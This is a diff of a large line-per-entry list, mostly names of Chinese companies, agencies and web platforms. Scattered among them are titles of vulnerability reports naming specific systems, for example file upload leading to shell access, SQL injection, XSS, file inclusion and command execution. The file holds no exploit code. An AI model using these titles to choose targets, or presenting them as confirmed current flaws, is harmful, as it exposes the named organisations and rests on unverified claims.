文峰大世界连锁发展股份有限公司 -新分享科技服务(深圳)有限公司 新华联文化旅游发展股份有限公司 -新时代健康产业(集团)有限公司 新疆同济堂健康产业股份有限公司 新疆生产建设兵团第十三师办公室 新疆维吾尔自治区卫生健康委员会 @@ -38996,10 +38946,8 @@ zstu 无锡新宏泰电器科技股份有限公司 无锡洪汇新材料科技股份有限公司 无锡派克新材料科技股份有限公司 -易联众民生(厦门)科技有限公司 晋城市陵川县食品药品监督管理局 晋江市个人住房危房翻建信息平台 -曼帕尔人力资源(北京)有限公司 朝阳市住房与城乡规划建设委员会 机械工业第六设计研究院有限公司 杭州前进齿轮箱集团股份有限公司 @@ -39018,7 +38966,7 @@ zstu 杭州雷迪克节能科技股份有限公司 杭州鸿泉物联网技术股份有限公司 杭州麟云科技有限公司成都分公司 -杰西博工程机械(上海)有限公司 +某智能网关系统任意文件删除漏洞 柳州国旅国际旅行社有限责任公司 株洲时代新材料科技股份有限公司 楚雄彝族自治州发展和改革委员会 @@ -39078,18 +39026,15 @@ zstu 河北衡水老白干酒业股份有限公司 河南中升华网络科技股份有限公司 河南四方达超硬材料股份有限公司 -河南宝视达眼镜(连锁)有限公司 河南思维自动化设备股份有限公司 河南省基础教育资源公共服务平台 河南省建筑市场监管公共服务平台 河南省普通高校招生考生服务平台 河南省滑县卫生和计划生育委员会 -河南省煤气(集团)有限责任公司 河南省职业学校学生学籍管理系统 河南省职业学校教师公共服务平台 河南省西峡汽车水泵股份有限公司 河源市高新技术开发区管理委员会 -波司登国际服饰(中国)有限公司 泰安市金斗网络科技有限责任公司 洛阳市安全生产综合监督管理系统 洛阳市工业产业产销对接联动平台 @@ -39159,7 +39104,6 @@ zstu 深圳市大为创新科技股份有限公司 深圳市大成知识产权代理有限公司 深圳市大族激光科技股份有限公司 -深圳市天健(集团)股份有限公司 深圳市奇信建设集团股份有限公司 深圳市容大感光科技股份有限公司 深圳市富满电子集团股份有限公司 @@ -39218,6 +39162,7 @@ zstu 深圳科创新源新材料股份有限公司 深圳科安达电子科技股份有限公司 深圳红瓜子文化传媒科技有限公司 +深圳经济特区房地产股份有限公司 深圳金三立视频科技股份有限公司 深圳金信诺高新技术股份有限公司 清江浦区人民代表大会常务委员会 @@ -39251,7 +39196,6 @@ zstu 烟台北方安德利果汁股份有限公司 烟台机动车驾驶培训公众服务平台 煤矿安全监管执法与决策支持系统 -爱森斯(江苏)生物科技有限公司 牡丹江市直机关目标管理考核系统 玉禾田环境发展集团股份有限公司 珠海智行慧达商务旅行社有限公司 @@ -39262,9 +39206,6 @@ zstu 甘肃省敦煌种业集团股份有限公司 甘肃省高分子材料重点实验室网站 甘肃祁连山水泥集团股份有限公司 -生活家(北京)家居装饰有限公司 -百塔工业品贸易(上海)有限公司 -盈信通(北京)信息技术有限公司 盐城市人力资源和社会资源保障网 石家庄井陉矿区住房和城乡建设局 石家庄常山北明科技股份有限公司 @@ -39282,11 +39223,9 @@ zstu 秦皇岛天秦装备制造股份有限公司 章丘市住房和城乡建设管理委员会 红星美凯龙家居集团股份有限公司 -红杉树(杭州)信息技术有限公司 绍兴市建设工程质量安全监督总站 维尔利环保科技集团股份有限公司 美年大健康产业控股股份有限公司 -美年大健康产业(集团)有限公司 联创食惟天有机农业科技有限公司 自然资源部四川基础地理信息中心 臺北市政府教育局教師在職研習網 @@ -39294,7 +39233,6 @@ zstu 舟山人力资源和社会保障信息中心 舟山市科技信息所舟山普陀山机场 舟山爱博仁人力资源咨询有限公司 -艺龙网信息技术(北京)有限公司 艾利丹尼森物流签收后台管理系统 苏州世华新材料科技股份有限公司 苏州中科创新型材料股份有限公司 @@ -39315,7 +39253,6 @@ zstu 英特尔杯全国大学生软件创新大赛 菲亚特克莱斯勒亚太投资有限公司 虎林市人民政府网上政务服务中心 -蜜米柏克思(上海)商贸有限公司 衡水市人民政府网上办事服务平台 西南交通大学远程与继续教育学院 西安市未央区食品药品监督管理局 @@ -39331,7 +39268,6 @@ zstu 贵州贵航汽车零部件股份有限公司 资阳市人力资源社会保障信息中心 资阳市政府网上信访投诉受理平台 -趣分期(北京)信息技术有限公司 远光能源互联网产业发展有限公司 连云港经济技术开发区管理委员会 遂宁市人事人才培训与人事考试网 @@ -39359,14 +39295,12 @@ zstu 长沙高新区科技服务与产业发展网 长河网信互联网有害图片检测系统 长白山管委会安全生产监督管理局 -陕西省地方电力(集团)有限公司 陕西省宝鸡市陈仓区政协门户网站 陕西省投资项目在线审批监管平台 陕西省西安市户县公安便民警务网 陕西省西安市老龄事业发展基金会 陕西省财政厅农业综合开发办公室 陕西航天动力高科技股份有限公司 -震坤行工业超市(上海)有限公司 青岛天华院化学工程股份有限公司 青岛市恒顺众昇集团股份有限公司 青岛市机动车驾驶员培训管理平台 @@ -39378,7 +39312,6 @@ zstu 青海省基础教育资源公共服务平台 青海省水利建设市场信用信息平台 顺德区农村集体资产管理交易平台 -飞行家投资管理(长沙)有限公司 马鞍山经济技术开发区管理委员会 驻马店市国有资产监督管理委员会 高平市空气质量实时数据发布系统 @@ -39386,7 +39319,6 @@ zstu 鸡东县人民政府网上政务服务中心 鸡西市人民政府网上政务服务中心 鹏博士电信传媒集团股份有限公司 -麦可思数据(成都)股份有限公司 黄河水利委员会黄河上中游管理局 黑河市人民政府网上政务服务中心 黑龙江江辰网络科技有限责任公司 @@ -39396,30 +39328,25 @@ zstu 黑龙江省森林工业总局森林防火网 武汉市新洲区科技和经济信息化局 武汉阳逻经济开发区 辽宁省第二水文地质工程地质大队 大连北方基础工程有限公司 -国家知识产权局区域专利信息服务(广州)中心 -江苏省新沂市烟草专卖局(分公司)内部交流平台 商业供应链系统前台任意文件上传+任意文件下载 成都特种设备检验院综合管理系统-JBoss后台未授权访问 纳米技术及应用国家工程研究中心-纳米中心 -微知库旗下所有网站存在越权漏洞/越权查看课程学员名单以及越权获取课程结业证书 必智软件通用办公云系统越权漏洞1 -某智能网关系统任意文件上传漏洞1(无需登录) +某智能网关系统任意文件上传漏洞1 一采通采购系统任意文件上传直接GETSHELL 一采通采购系统任意文件上传直接GETSHELL2 夸微科技旗下多个系统存在通用型SQL注入可UNION 广州巨腾科技有限公司存在通用型SQL注入漏洞 智能仪表集抄管理系统存在通用型SQL注入漏洞 +河南雪城软件网站群内容管理系统SQL注入漏洞 济南杰飞软件建站系统存在通用型SQL注入漏洞 艾特律师软件管理平台存在通用型SQL注入漏洞 -河南雪城软件网站群内容管理系统SQL注入漏洞2(涉及大量政府系统) -河南雪城软件网站群内容管理系统SQL注入漏洞(涉及大量政府系统) +河南雪城软件网站群内容管理系统SQL注入漏洞2 江西省南昌市红谷滩新区红谷凯旋VR智慧社区警务管理服务平台 齐博分类信息系统前台某处存储型XSS 广州网软志成信息科技有限公司某b2b2c电商平台一处用户信息泄露 -一嗨租车服务管理(上海)有限公司 上海中城联盟投资管理股份有限公司 上海中洲特种合金材料股份有限公司 -上海交运巴士客运(集团)有限公司 上海佳诚包装机械设备制造有限公司 上海健一网大药房连锁经营有限公司 上海全筑建筑装饰集团股份有限公司 @@ -39444,9 +39371,7 @@ zstu 上海市松江区卫生和计划生育委员会 上海市金山区中小企业上市管理平台 上海市金山区空气质量实时发布系统 -上海广电电气(集团)股份有限公司 上海开创国际海洋资源股份有限公司 -上海微创医疗器械(集团)有限公司 上海微创心脉医疗科技股份有限公司 上海技能人才就业服务综合管理平台 上海新炬网络信息技术股份有限公司 @@ -39465,16 +39390,12 @@ zstu 上海至纯洁净系统科技股份有限公司 上海舜地实业集团酒店管理有限公司 上海证大喜马拉雅网络科技有限公司 -上海邮通科技有限公司(世纪天成) 上海锦和商业经营管理股份有限公司 上海锦江国际实业投资股份有限公司 上海锦江国际酒店发展股份有限公司 -上田商工(上海)服饰商贸有限公司 -且康健康管理咨询(上海)有限公司 世纪文都教育科技集团股份有限公司 东北财经大学经济与社会发展研究院 东方电气集团东方锅炉股份有限公司 -东方银谷(北京)投资管理有限公司 东易日盛家居装饰集团股份有限公司 东莞糖酒集团美宜佳便利店有限公司 中交隧道工程局有限公司华北分公司 @@ -39490,6 +39411,7 @@ zstu 中华人民政治协商会议桂林市委员会 中华全国工商业联合会科技奖工作网 中国中铁一局集团第四工程有限公司 +中国义乌国际小商品博览会官方网站 中国人民人寿财产保险股份有限公司 中国人民政治协商会议乌海市委员会 中国人民政治协商会议兰州市委员会 @@ -39509,11 +39431,10 @@ zstu 中国国民党革命委员会济南市委员会 中国国民党革命委员会烟台市委员会 中国国际贸易促进委员会湖南省分会 -中国大顺国际物流(北京)有限公司 中国建材检验认证集团股份有限公司 -中国建筑第二工程局有限公司(沪) 中国有色金属工业建设工程质量总站 中国林业科学研究院资源昆虫研究所 +中国残疾人联合会听力语言康复中心 中国江西国际经济技术合作有限公司 中国电信股份有限公司云计算分公司 中国电子科技集团公司第五十研究所 @@ -39529,19 +39450,13 @@ zstu 中国铁塔股份有限公司河南省分公司 中国黄金集团黄金珠宝股份有限公司 中建三局第一建设工程有限责任公司 -中报国际文化传媒(北京)有限公司 中文在线数字出版集团股份有限公司 中文天地出版传媒集团股份有限公司 中源协和细胞基因工程股份有限公司 -中粮生物化学(安徽)股份有限公司 -中经互联(北京)信息技术有限公司 中航工业成都凯天电子股份有限公司 中航西安飞机工业集团股份有限公司 -中证金牛(北京)投资咨询有限公司 -中道(苏州)旅游网络科技有限公司 中钢集团安徽天源科技股份有限公司 中钢集团马鞍山矿山研究院有限公司 -中青网新媒体科技(北京)有限公司 临沂市国土资源局土地储备中心网站 丹东市人力资源和社会保障局信息网 乐山高新技术产业开发区管理委员会 @@ -39551,12 +39466,8 @@ zstu 云南盘谷医疗产业管理有限责任公司 云南省公证行政管理和行业管理系统 云南省文山州人力资源和社会保障局 -五洲汉风网络科技(北京)有限公司 交通运输部天津水运工程科学研究所 交通运输部路网监测与应急处置中心 -亿恒讯通(北京)网络技术有限公司 -众升财富(北京)基金销售有限公司 -传神联合(北京)信息技术有限公司 佛山市丰智胜教育咨询服务有限公司 佛山市南海佰什特通用设备有限公司 佛山市金银河智能装备股份有限公司 @@ -39565,11 +39476,8 @@ zstu 信呼协同办公系统两处高危越权操作 儿童发育疾病研究教育部重点实验室 光彩玖玖湖北金融服务股份有限公司 -克莱斯勒(中国)汽车销售有限公司 全国公路建设市场信用信息管理系统 全国民办高校学生信息公共查询平台 -六六八八科技发展(北京)有限公司 -六安市国土资源局(不动产登记局) 兰州丽尚国潮实业集团股份有限公司 兰州市中小学生保健所视力筛查平台 兽医教学医院国立中兴大学兽医学院 @@ -39581,9 +39489,6 @@ zstu 内蒙古自治区人力资源和社会保障厅 内蒙古通辽市华清节能设备有限公司 内蒙古霍林河露天煤业股份有限公司 -创兴动力(北京)咨询服务有限公司 -创智汇德(北京)科技发展有限公司 -劲旅兴业(北京)教育科技有限公司 北京世纪弈城围棋文化传播有限公司 北京世纪金政信息技术股份有限公司 北京东方中科集成科技股份有限公司 @@ -39631,7 +39536,6 @@ zstu 北京市海淀区人力资源和社会保障局 北京市顺义区人力资源公共服务中心 北京市顺义区人力资源和社会保障局 -北京康加科技有限公司(康加科技) 北京弘高创意建筑设计股份有限公司 北京恒通创新赛木科技股份有限公司 北京掌上通网络技术股份有有限公司 @@ -39669,13 +39573,9 @@ zstu 北京高能时代环境技术股份有限公司 北京龙城丽华快餐餐饮管理有限公司 北创图书检索系统重置任意账号密码 -北外在线(北京)教育科技有限公司 北大青鸟环宇消防设备股份有限公司 -北斗导航位置服务(北京)有限公司 北海国发海洋生物产业股份有限公司 北海银河生物产业投资股份有限公司 -千钧万博(北京)信息技术有限公司 -华大天元(北京)科技股份有限公司 南京华东电子信息科技股份有限公司 南京奥联汽车电子电器股份有限公司 南京市建筑业施工人员服务管理中心 @@ -39689,7 +39589,6 @@ zstu 厦门弘信电子科技集团股份有限公司 厦门灵感方舟信息科技股份有限公司 厦门艾德生物医药科技股份有限公司 -双钱集团(安徽)回力轮胎有限公司 合肥市数字图书馆统一资源访问平台 合肥泰禾智能科技集团股份有限公司 合肥维天运通信息科技股份有限公司 @@ -39701,10 +39600,8 @@ zstu 吉林省桦甸市守君塑料制品有限公司 吉林省长白山保护开发区管理委员会 启明星辰信息技术集团股份有限公司 -咕嘟妈咪(上海)信息咨询有限公司 哈尔滨东安汽车发动机制造有限公司 哈药集团人民同泰医药股份有限公司 -嗨皮(上海)网络科技股份有限公司 四川山鼎建筑工程设计股份有限公司 四川省住房和城乡建设网上办事大厅 四川省政府国有资产监督管理委员会 @@ -39719,6 +39616,7 @@ zstu 因酷免费开源网校系统一处越权漏洞 因酷在线教育软件任意文件删除漏洞 因酷在线教育软件通用高危逻辑漏洞 +因酷在线教育软件重置任意账号密码 固安县莱福特过滤器材有限公司网站 国信电子票据平台信息服务有限公司 国家核安全局人员资质管理信息系统 @@ -39727,7 +39625,6 @@ zstu 国家食品安全技术资源调查管理系统 国家食品药品监督管理投诉举报中心 国新健康保障服务集团股份有限公司 -在库言库(北京)信息技术有限公司 基础教育领域国际型学校评价指数网 壹玖壹玖酒类平台科技股份有限公司 外语教学与研究出版社有限责任公司 @@ -39738,7 +39635,6 @@ zstu 大连市肉菜追溯管理平台系统弱口令 大连易世达新能源发展股份有限公司 大连船舶工程技术研究中心有限公司 -天一华宇(中国)航天科技企业集团 天津北方网新媒体集团股份有限公司 天津市人力资源和社会保障信息中心 天津绿茵景观生态建设股份有限公司 @@ -39760,6 +39656,7 @@ zstu 宁波润禾高新材料科技股份有限公司 宁波理工环境能源科技股份有限公司 宁波高发汽车控制系统股份有限公司 +安吉县综合行政执法局智慧党建平台 安徽商信政通信息技术股份有限公司 安徽国祯环保节能科技股份有限公司 安徽海螺信息技术工程有限责任公司 @@ -39767,11 +39664,9 @@ zstu 安徽省高层次人才综合信息服务平台 安徽省黄山市人力资源和社会保障局 安徽科大讯飞信息科技股份有限公司 -安瑞维尔(北京)信息技术有限公司 宜昌市三峡旅游景区年卡管理办公室 +宝大祥青少年儿童购物股份有限公司 宝鸡市陈仓区公共就业和人才服务网 -小明太极(湖北)国漫文化有限公司 -小船出海教育科技(北京)有限公司 山东世纪天鸿文教科技股份有限公司 山东中农联合生物科技股份有限公司 山东好食好客信息科技股份有限公司 @@ -39812,7 +39707,6 @@ zstu 广东新劲刚新材料科技股份有限公司 广东明家联合移动科技股份有限公司 广东汤臣倍健生物科技股份有限公司 -广东海印永业(集团)股份有限公司 广东省应对技术性贸易壁垒信息平台 广东省惠州市人力资源和社会保障局 广东省江门市人力资源和社会保障局 @@ -39840,7 +39734,6 @@ zstu 开封市机动车驾驶培训公众服务平台 徐州经贸职业高等学校精品课程平台 德尔未来科技控股集团股份有限公司 -快快金融信息服务(上海)有限公司 惠州社保基金电子监察平台数据接口 成都佳发安泰教育科技股份有限公司 成都华气厚普机电设备股份有限公司 @@ -39853,7 +39746,6 @@ zstu 成都诚信人力资源管理顾问有限公司 成都金牛制冷网上超市后台管理系统 扬州市邗江区卫生和计划生育委员会 -拉萨市商务局(拉萨市投资促进局) 招商局蛇口工业区控股股份有限公司 文化部全国公共文化发展中心美育馆 新余市文化广播电影电视新闻出版局 @@ -39862,15 +39754,12 @@ zstu 新疆维吾尔自治区住房和城乡建设厅 新疆维吾尔自治区发展和改革委员会 新疆维吾尔自治区扶贫开发领导小组 -方家铺子(莆田)绿色食品有限公司 无锡华光环保能源集团股份有限公司 无锡药明康德新药开发股份有限公司 日照市东港区人力资源和社会保障局 昆山市工业技术研究院有限责任公司 昆山新莱洁净应用材料股份有限公司 -易淘星空网络科技(北京)有限公司 -易联众(厦门)大数据科技有限公司 -智慧平台(北京)网络技术有限公司 +智明文档管理系统一处任意文件操作 杭州华星创业通信技术股份有限公司 杭州品茗安控信息技术股份有限公司 杭州市余杭区人力资源和社会保障局 @@ -39880,8 +39769,8 @@ zstu 杭州联络互动信息科技股份有限公司 杭锦后旗农牧业公共信息综合服务网 某人才网系统存在权限绕过越权删除 +某智能网关系统任意文件上传洞漏洞 株洲飞鹿高新材料技术股份有限公司 -欧美嘉(北京)国际旅行社有限公司 武汉东湖生态旅游风景区管理委员会 武汉市丰谊商务国际旅行社有限公司 武汉市人力资源和社会保障信息中心 @@ -39930,9 +39819,7 @@ zstu 河南省哲学社会科学规划基金办公室 河南省永城市神火集团有限股份公司 河源市机动车驾驶培训公众服务平台 -派博在线(北京)科技有限责任公司 济南泛亚交通运输信息咨询有限公司 -浙旅(重庆)万州大瀑布群有限公司 浙江东方基因生物制品股份有限公司 浙江东方金融控股集团股份有限公司 浙江中国小商品城集团股份有限公司 @@ -39963,7 +39850,6 @@ zstu 海南会计人员继续教育网络培训平台 海南天涯社区网络科技股份有限公司 海南天然橡胶产业集团股份有限公司 -海南省农业学校(海南省科技学校) 海南省学生体质与健康数据管理中心 海南省防汛防风防旱总指挥部办公室 海南神农大丰种业科技股份有限公司 @@ -39990,7 +39876,6 @@ zstu 深圳市好百年家居连锁股份有限公司 深圳市富安娜家居用品股份有限公司 深圳市应用三六五网络科技有限公司 -深圳市康达尔(集团)股份有限公司 深圳市建筑科学研究院股份有限公司 深圳市房地产中介协会深圳中协官网 深圳市拓日新能源科技股份有限公司 @@ -40027,9 +39912,7 @@ zstu 湖南省怀化市卫生和计划生育委员会 湖南省非法集资风险防范与预警系统 漱玉平民大药房里连锁股份有限公司 -激声博韵(上海)乐器贸易有限公司 濮阳市华龙区人口和计划生育委员会 -炎黄东方(北京)健康科技有限公司 烟台市牟平区机构编制委员会办公室 烟台杰瑞石油服务集团股份有限公司 爱康国宾健康体检管理集团有限公司 @@ -40041,9 +39924,9 @@ zstu 甘肃省机械科学研究院有限责任公司 甘肃省酒泉市瓜州县柳园学校化工厂 甘肃省金昌市人民政府政务服务中心 -甘肃荣华实业(集团)股份有限公司 甘肃蓝科石化高新装备股份有限公司 甘肃酒钢集团宏兴钢铁股份有限公司 +畅越飞平有色金属储运股份有限公司 益阳市人民政府电子政务管理办公室 盐城市盐都区远程教育综合服务平台 石家庄市轨道交通建设有限责任公司 @@ -40056,13 +39939,11 @@ zstu 科学技术部火炬高技术产业开发中心 绥芬河市人民政府网上政务服务中心 绵阳市涪城区人民政府政务服务中心 -缤刻普锐(北京)科技有限责任公司 -网神信息技术(北京)股份有限公司 腾邦国际商业服务集团股份有限公司 舆情管理平台存在远程命令执行漏洞 舟山市普陀山风景名胜区管理委员会 +艾艾精密工业输送系统股份有限公司 芜湖莫森泰克汽车科技股份有限公司 -芭乐互动(北京)文化传媒有限公司 苏州中节能索乐图日光科技有限公司 苏州工业园区人力资源开发有限公司 苏州工业园区人民法院青少年维权网 @@ -40074,12 +39955,7 @@ zstu 苏州苏大维格光电科技股份有限公司 苏州苏大维格科技集团股份有限公司 苏州麦迪斯顿医疗科技股份有限公司 -荣昌耀华网络技术(北京)有限公司 -莱克电气绿能科技(苏州)有限公司 菏泽市牡丹区才聚人力资源有限公司 -萨科(深圳)科技有限公司版权所有 -蓝海天扬影视文化(北京)有限公司 -藤门出国留学服务(上海)有限公司 蚌埠市人力资源和社会保障信息中心 衡水高新技术产业开发区行政审批局 衢州市人力资源和社会保障信息中心 @@ -40087,22 +39963,16 @@ zstu 西藏易明西雅医药科技股份有限公司 贵州三都农村商业银行股份有限公司 贵州久联民爆器材发展股份有限公司 -贵州开磷控股(集团)有限责任公司 贵州百灵企业集团制药股份有限公司 贵州省黔东南苗族侗族自治州水利局 贵州省黔西南州安全生产监督管理局 贵州茅台集团电子商务股份有限公司 贵阳市党员干部现代远程教育云平台 -贺尔碧格东方齿轮(泰州)有限公司 -赛业健康研究中心(太仓)有限公司 -赛尔互联(北京)教育科技有限公司 轨道交通控制与安全国家重点实验室 -软通动力信息技术(集团)有限公司 辽宁省本溪市全国公共资源交易平台 辽宁省铁岭市人力资源与社会保障网 通用学习管理系统任意文件上传漏洞 邢台医学高等专科学校第二附属医院 -邦储国际货运代理(上海)有限公司 郑州信泽华计算机技术开发有限公司 郑州市房屋租赁信息服务与监管平台 郑州市景安计算机网络技术有限公司 @@ -40110,7 +39980,6 @@ zstu 郑州灿烂阳光旅游咨询服务有限公司 郑州艾迪创想企业营销策划有限公司 重庆医流巴巴医疗器械连锁有限公司 -重庆城建控股(集团)有限责任公司 重庆市沙坪坝区经济和信息化委员会 重庆市石柱土家族自治县教育委员会 重庆广播电视集团阳光重庆传媒中心 @@ -40119,9 +39988,7 @@ zstu 重庆正川医药包装材料股份有限公司 重庆渝富资产经营管理集团有限公司 重庆登康口腔护理用品股份有限公司 -重庆福安药业(集团)股份有限公司 重庆蓝黛动力传动机械股份有限公司 -铁血君客(北京)电子商务有限公司 银川新华百货商业集团股份有限公司 锡盟郭勒城乡居民医疗保险信息网站 镇江市京口区人事劳动和社会保障局 @@ -40134,13 +40001,10 @@ zstu 长沙中联重工科技发展股份有限公司 陇西县农村党员干部现代远程教育网 陕西五环胜道运动产业开发有限公司 -陕西延长石油(集团)有限责任公司 陕西省西咸新区沣东新城管理委员会 陕西省西咸新区空港新城管理委员会 陕西科汇天诚电子技术开发有限公司 隆基泰和实业有限公司存在上传漏洞 -雅座在线(北京)科技发展有限公司 -集慧知识产权代理(北京)有限公司 青岛市机动车驾驶培训服务管理平台 青岛盛世闽商信息技术服务有限公司 青岛腾信汽车网络科技服务有限公司 @@ -40148,11 +40012,9 @@ zstu 青海春天药用资源科技利用有限公司 青海春天药用资源科技股份有限公司 青海省自然资源厅测绘地理信息管理 -韧启企业管理咨询(上海)有限公司 首届全球吉商大会首届全球吉商大会 骆驼集团武汉光谷研发中心有限公司 鹏博士电信传媒集团数据中心事业部 -麦克奥迪(厦门)电气股份有限公司 黄石市人民政府外事侨务办公室网站 黑龙江农垦牡丹江管理局信息港网站 黑龙江加格达奇区网上政务服务中心 @@ -40165,10 +40027,7 @@ zstu 黔南民族师范学院学报在线投稿系统 齐博图片系统前台某处文件包含漏洞 齐博黄页系统某处存在文件包含漏洞 -齐鲁证券(上海)资产管理有限公司 齐齐哈尔市数字城管系统存在弱口令 -龙飞凤舞(福建)电子商务有限公司 -陕西煤业化工建设(集团)有限公司 - 陕西煤业化工建设(集团)有限公司 合协人力资源平台系统任意文件上传+任意文件读取漏洞 江泰保险经纪股份有限公司某处漏洞2 一浪网络建站系统系列站点存在多处SQL注入打包 @@ -40182,7 +40041,6 @@ zstu 济南宇霞信息技术有限公司建站系统product.php页面存在SQL注入漏洞 四川郎酒集团有限责任公司搜索界面sql注入 三都水族自治县人力资源和社会保障局 -上海众言网络科技有限公司(问卷网) 上海克来机电自动化工程股份有限公司 上海太和水环境科技发展股份有限公司 上海工商职业技术学院就业信息服务网 @@ -40194,11 +40052,11 @@ zstu 上海张江高科技园区开发股份有限公司 上海新世纪资信评估投资服务有限公司 上海新南洋昂立教育科技股份有限公司 +上海永冠众诚新材料科技股份有限公司 上海爱就投金融信息服务股份有限公司 上海至正道化高分子材料股份有限公司 上海金桥出口加工区开发股份有限公司 上海陛通半导体能源科技股份有限公司 -东方信天翁(北京)国际贸易有限公司 东莞市南兴家具装备制造股份有限公司 东莞市糖酒集团美宜佳便利店有限公司 中信湘雅生殖与遗传专科医院有限公司 @@ -40225,13 +40083,10 @@ zstu 中铁十一局集团建筑安装工程有限公司 临夏回族自治州人力资源和社会保障局 丹东市宽甸满族自治县经济和信息化局 -乐视网信息技术(北京)股份有限公司 云南省应用基础研究计划项目管理系统 云南贝泰妮生物科技集团股份有限公司 云汉芯城上海互联网科技股份有限公司 -仁和药房网(北京)医药科技有限公司 余杭区政府信息公开综合业务管理系统 -俏十岁生物科技(北京)股份有限公司 全国文化信息资源共享工程山西分中心 公安部特种警用装备质量监督检验中心 内蒙古君正能源化工集团股份有限公司 @@ -40253,7 +40108,6 @@ zstu 北京映翰通网络技术股份有限责任公司 北京松雷菲姆勒网络文化传播有限公司 北京瀚思安信科技有限公司成都分公司 -北京王府井百货(集团)股份有限公司 北京电子城投资开发集团股份有限公司 北京第二外国语学院中瑞酒店管理学院 北京航空航天大学能源与动力工程学院 @@ -40262,7 +40116,6 @@ zstu 北京隆达欣网络信息技术服务有限公司 北京首航艾启威节能技术股份有限公司 华中科技大学同济医学院附属协和医院 -华尔街英语培训中心(上海)有限公司 南京佳力图机房环境技术股份有限公司 南京大学城市规划设计研究院有限公司 南京大学昆山创新研究院检测检验中心 @@ -40272,30 +40125,24 @@ zstu 南京虎凤蝶电子商务科技股份有限公司 南京邮电大学计算机学院实验教学中心 博爱新开源医疗科技集团股份有限公司 -卫材(中国)药业有限公司上海分公司 厦门二五八网络科技集团股份有限公司 厦门象屿速传供应链发展股份有限公司 -发现时空国际旅行社(北京)有限公司 句容市人力资源和社会保障局信息中心 合肥经济技术开发区管委会社会发展局 吉林公主岭经济开发区安全生产委员会 吉林建筑工程学院测绘与勘查工程学院 吉林省差旅天下网络技术股份有限公司 吉林省彩虹人才开发咨询服务有限公司 -同方知好乐教育科技(北京)有限公司 -哈尔滨工业大学(深圳)经济管理学院 唐山市机动车驾驶员培训公众服务平台 四川交通运输厅高速公路监控结算中心 -四川新闻网传媒(集团)股份有限公司 四川省华洁嘉业环保科技有限责任公司 四川省有线广播电视网络股份有限公司 -四川省汶川卧龙特别行政区(管理局) 四川省甘孜藏族自治州理塘县人民政府 四川金石东方新材料设备股份有限公司 -团车互联网信息服务(北京)有限公司 国土资源部农村土地整治监测监管系统 国家农产品现代物流工程技术研究中心 国家电投集团东方新能源股份有限公司 +国家知识产权局区域专利信息服务中心 国家计算机网络应急技术处理协调中心 大庆市城市管理委员会物业管理办公室 天地伟业服务器软件任意文件上传漏洞 @@ -40308,11 +40155,9 @@ zstu 天津经济技术开发区管理委员会办公室 天津美维信息技术有限公司成都分公司 奥佳华智能健康科技集团股份有限公司 -威富服饰(中国)有限公司上海分公司 宁夏回族自治区卫生和计划生育委员会 宁夏回族自治区卫生和计划生育监督局 宁波摩西网络技术有限公司上海分公司 -宇龙计算机通信科技(深圳)有限公司 安徽中电兴发与鑫龙科技股份有限公司 安徽省电子认证管理中心有限责任公司 宗申•比亚乔佛山摩托车企业有限公司 @@ -40358,7 +40203,6 @@ zstu 晋城市公安局交通警察支队直属三大队 杭州市萧山区人民政府金融工作办公室 杭州鹳鸟网络科技有限公司全球机械网 -林同棪国际工程咨询(中国)有限公司 某厂商数字校园系统重置管理密码漏洞 株洲欧科亿数控精密刀具股份有限公司 格尔木市行政服务和公共资源交易中心 @@ -40424,14 +40268,12 @@ zstu 百视通网络电视技术发展有限责任公司 益海嘉里金龙鱼粮油食品股份有限公司 盐城市人民代表大会常务委员会办公室 -神州顺利办企业发展(上海)有限公司 福建漳州古雷港经济开发区党政办公室 福建省住房和城乡建设厅职称申报系统 福建省邮电学校心理健康教育指导中心 秦皇岛市五六七七零网络科技有限公司 秦皇岛市住房保障和房产管理局政务网 绍兴县公共资源交易管理委员会办公室 -舒泰神(北京)生物制药股份有限公司 舟山市科技信息所舟山普陀山机场官网 芜湖伯特利汽车安全系统股份有限公司 苏州市人力资源社会保障培训指导中心 @@ -40442,11 +40284,9 @@ zstu 贵州省遵义市正安县教育和科学技术局 贵州贵阳市清镇市安全生产监督管理局 贵阳市人民代表大会常务委员会办公厅 -车好多旧机动车经纪(北京)有限公司 重庆保税港区进出口商品贸易有限公司 重庆市武隆区人民代表大会常务委员会 重庆市重点产业人力资源服务有限公司 -金联储(北京)金融信息服务有限公司 长春一汽富维汽车零部件股份有限公司 长沙高新开发区通通数码科技有限公司 阜阳市人民代表大会常务委员会办公室 @@ -40457,9 +40297,9 @@ zstu 陕西煤业化工技术研究院有限责任公司 随州市曾都区金思维网络科技有限公司 青岛市机动车驾驶员培训公众服务平台 +青岛市电子政务和信息资源管理办公室 青岛昌盛日电太阳能科技股份有限公司 青海省投资项目在线审批审批监管平台 -青青优农(北京)农产品贸易有限公司 马鞍山师范高等专科学校就业指导中心 齐博企业系统最新版存在文件包含漏洞 龙门石窟世界文化遗产园区管理委员会 @@ -40469,8 +40309,6 @@ zstu 天地伟业服务器软件任意文件上传漏洞3 金水来自来水综合管理平台存在通用型SQL注入 杜特软件网上订单管理系统存在通用型SQL注入漏洞 -因酷在线教育软件重置任意账号密码(demo复现) -智明文档管理系统一处任意文件操作(demo演示) 青岛商至信网络科技有限公司建站系统gallery.php存在SQL注入 青岛商至信网络科技有限公司建站系统lisp.php存在SQL注入漏洞 青岛商至信网络科技公司网站建设系统show.php存在SQL注入 @@ -40482,13 +40320,14 @@ zstu 上海二三四五网络控股集团股份有限公司 上海市中等职业学校基本情况数据库平台 上海市网络与信息安全应急管理事务中心 +上海德必文化创意产业发展股份有限公司 上海海顺新型药用包装材料股份有限公司 上海陆家嘴金融贸易区开发股份有限公司 中共河北省委军民融合发展委员会办公室 中共连云港市委市级机关工作委员会网站 中华人民共和国北京出入境边防检查总站 +中华人民共和国国际湿地公约履约办公室 中华人民共和国珠海出入境边防检查总站 -中国中建设计集团有限公司(直营总部) 中国中铁电气化局集团第一工程有限公司 中国市政工程中南设计研究总院有限公司 中国建筑第二工程局有限公司上海分公司 @@ -40500,18 +40339,13 @@ zstu 中国能建西北电力建设第四工程有限公司 中国铁建电气化局集团北方工程有限公司 中国长江航运集团南京油运股份有限公司 -中国首钢水城钢铁(集团)有限责任公司 -中大英才(北京)网络教育科技有限公司 中新苏州工业园区开发集团股份有限公司 中铁建大桥工程局集团第一工程有限公司 -书香门第(上海)美学家居股份有限公司 -亨特道格拉斯建筑产品(中国)有限公司 京北方信息技术股份有限公司成都分公司 以岭药业电子采购平台电子采购平台注入 伊春市西林区庆红食用菌农名专业合作社 余姚市上易网络有限公司旗下慢慢买官网 佛山市南海中旅假日国际旅行社有限公司 -你好汇众科技发展(北京)有限责任公司 兖州煤业股份有限公司设备共享管理平台 